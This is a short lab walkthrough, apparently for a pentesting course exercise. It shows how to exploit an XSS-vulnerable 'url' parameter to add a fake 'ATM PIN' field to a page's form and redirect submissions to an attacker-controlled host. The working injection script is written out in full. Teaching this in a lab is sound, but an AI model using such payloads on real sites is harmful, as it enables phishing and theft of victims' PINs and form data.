Advancing and getting your hands dirtier in manipulating forms is our next task. For that Javascript for Pentester comes with task 4 and that is modifying form fields. You can view solutions to the other tasks here.
Task 4: Modify Form Fields | Task Link
In this task, you have to insert an extra form element into the existing form and submit the form to an attacker-controlled machine. This has to be done dynamically using XSS vulnerability.
Solution:
Again by adopting the same approach, analyze the source code and find the injection point. The injection point in this task is “url” parameter. Copy and URL-encode the code given below and paste it after the “url” parameter.
<script>
var frcon = document.forms[0];
var atm = document.createElement('input');
atm.type = 'text';
atm.name = 'atm';
atm.placeholder = 'ATM PIN';
atm.class = 'input-block-level';
frcon.insertBefore(atm,frcon.elements[0]);
frcon.action = "http://localhost:8000/"
</script>In this code first seven lines are used to create new form element “ATM” and the last line is again from last challenge used to change the action of the form. When victim submits the form, the input elements will be sent to attacker machine through GET request, same as in the last task.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.
